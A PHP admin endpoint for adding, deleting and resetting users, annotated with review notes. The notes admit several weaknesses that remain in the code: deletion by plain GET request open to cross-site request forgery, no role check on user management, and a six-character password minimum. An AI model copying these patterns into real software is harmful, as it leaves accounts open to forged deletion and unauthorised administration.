Viewing: user_actions.php
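<?php
/**
 * User administration endpoint for the admin dashboard.
 *
 * Dispatches on the `action` request parameter:
 *   - add    (POST)  create a user from `username`, `password`, `confirm`
 *   - delete (GET)   remove the user given by `id`
 *   - reset  (POST)  set a random password for the user `id` and return it as JSON
 *
 * Ajax callers (X-Requested-With: XMLHttpRequest) receive JSON; other callers
 * are redirected back to the dashboard. Any other request is redirected to
 * the dashboard unchanged.
 */

session_start();

// Only authenticated sessions may manage users.
// NOTE(review): any logged-in session passes; no role or permission test is
// visible here. Confirm that every account is meant to be an administrator.
if (!isset($_SESSION['user_id'])) {
    header('Location: ../../admin/login.php');
    exit();
}

// NOTE(review): $base ends in a URL fragment, so the "&error=..." / "&ok=1"
// suffixes appended below become part of the fragment and never reach the
// server; presumably the dashboard script reads them client-side. Confirm.
$base = '/0.14-Curriculum_Daniel/admin/dashboard.php#users-tab';

$action = $_REQUEST['action'] ?? '';

// Defence in depth against cross-site request forgery: browsers that send
// Fetch Metadata label requests started by another site as "cross-site", and
// no legitimate dashboard request carries that label. This does not replace a
// per-session CSRF token, which needs a matching change in the dashboard forms.
if (in_array($action, ['add', 'delete', 'reset'], true)
    && strtolower($_SERVER['HTTP_SEC_FETCH_SITE'] ?? '') === 'cross-site') {
    user_action_fail(403, 'Origen no permitido', $base);
}

require_once __DIR__ . '/db.php';

try {
    $pdo = db();
} catch (PDOException $e) {
    // The exception detail is deliberately not echoed to the client.
    user_action_fail(500, 'DB', $base);
}

/**
 * Tell whether the request was flagged as Ajax via X-Requested-With.
 *
 * The header is client-controlled; it only selects the response format and
 * must not be relied on for any security decision.
 */
function isAjax(): bool
{
    return isset($_SERVER['HTTP_X_REQUESTED_WITH'])
        && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest';
}

/**
 * Report a failure and stop: JSON with the given status for Ajax callers,
 * otherwise a redirect to the dashboard carrying the message.
 *
 * @param int    $status  HTTP status used for the Ajax response
 * @param string $message Error text shown to the user
 * @param string $base    Dashboard URL the non-Ajax caller is sent back to
 */
function user_action_fail($status, $message, $base)
{
    if (isAjax()) {
        http_response_code($status);
        header('Content-Type: application/json');
        echo json_encode(['ok' => false, 'error' => $message]);
        exit();
    }
    header('Location: ' . $base . '&error=' . rawurlencode($message));
    exit();
}

/**
 * Generate a random password from an alphabet without look-alike characters.
 *
 * Each character is drawn with random_int(), which is uniform over the
 * alphabet. Reducing a random byte modulo the alphabet size would favour the
 * first characters whenever 256 is not a multiple of that size.
 *
 * @param int $length Number of characters to generate
 * @return string
 */
function random_password(int $length = 12): string
{
    $chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz23456789!@#$%&*?';
    $last = strlen($chars) - 1;
    $out = '';
    for ($i = 0; $i < $length; $i++) {
        $out .= $chars[random_int(0, $last)];
    }
    return $out;
}

if ($action === 'add' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = trim($_POST['username'] ?? '');
    // NOTE(review): trimming changes the string that gets hashed; the login
    // code has to trim the same way or such passwords will never match.
    $password = trim($_POST['password'] ?? '');
    $confirm = trim($_POST['confirm'] ?? '');

    if ($username === '' || $password === '' || $confirm === '') {
        user_action_fail(400, 'Campos obligatorios', $base);
    }
    // Allow-list for usernames: 3 to 32 letters, digits, dot, underscore, hyphen.
    if (!preg_match('/^[a-zA-Z0-9._-]{3,32}$/', $username)) {
        user_action_fail(400, 'Usuario inválido', $base);
    }
    if ($password !== $confirm) {
        user_action_fail(400, 'Las contraseñas no coinciden', $base);
    }
    // NOTE(review): six characters is a weak minimum for an account that can
    // manage other users; consider raising it. bcrypt also ignores input
    // beyond 72 bytes, so longer passwords are silently truncated.
    if (strlen($password) < 6) {
        user_action_fail(400, 'Contraseña muy corta', $base);
    }

    // Friendly duplicate check. A UNIQUE constraint on users.username is still
    // needed to close the race between this SELECT and the INSERT (schema not
    // visible here).
    $stmt = $pdo->prepare('SELECT id FROM users WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $username]);
    if ($stmt->fetch()) {
        user_action_fail(409, 'El usuario ya existe', $base);
    }

    $hash = password_hash($password, PASSWORD_BCRYPT);
    $ins = $pdo->prepare('INSERT INTO users(username, password) VALUES(:u, :p)');
    $ins->execute([':u' => $username, ':p' => $hash]);

    if (isAjax()) {
        header('Content-Type: application/json');
        echo json_encode(['ok' => true, 'id' => (int)$pdo->lastInsertId(), 'username' => $username]);
        exit();
    }
    header('Location: ' . $base . '&ok=1');
    exit();
}

// NOTE(review): this is a state change reachable with a plain GET, so a link or
// image URL is enough to trigger it from an authenticated browser. It should
// become a POST protected by a CSRF token; the GET form is kept here because
// the dashboard markup that calls it is outside this file.
if ($action === 'delete' && isset($_GET['id'])) {
    $id = (int)$_GET['id'];

    // An account may not delete itself.
    if ($id === (int)$_SESSION['user_id']) {
        user_action_fail(400, 'No puede eliminar su propio usuario', $base);
    }

    $del = $pdo->prepare('DELETE FROM users WHERE id = :id');
    $del->execute([':id' => $id]);

    if (isAjax()) {
        header('Content-Type: application/json');
        echo json_encode(['ok' => true, 'id' => $id]);
        exit();
    }
    header('Location: ' . $base . '&ok=1');
    exit();
}

if ($action === 'reset' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    // This action always answers in JSON, Ajax header or not.
    header('Content-Type: application/json');
    // The success response carries a plaintext password: keep it out of
    // browser and proxy caches.
    header('Cache-Control: no-store');

    $id = (int)($_POST['id'] ?? 0);
    if ($id <= 0) {
        echo json_encode(['ok' => false, 'error' => 'ID']);
        exit();
    }
    if ($id === (int)$_SESSION['user_id']) {
        echo json_encode(['ok' => false, 'error' => 'No puede resetear su propia clave aquí']);
        exit();
    }

    $new = random_password(12);
    $hash = password_hash($new, PASSWORD_BCRYPT);
    $up = $pdo->prepare('UPDATE users SET password = :p WHERE id = :id');
    $up->execute([':p' => $hash, ':id' => $id]);

    // The plaintext is returned exactly once; only the bcrypt hash is stored.
    echo json_encode(['ok' => true, 'password' => $new]);
    exit();
}

// Unknown or missing action: back to the dashboard.
header('Location: ' . $base);
exit();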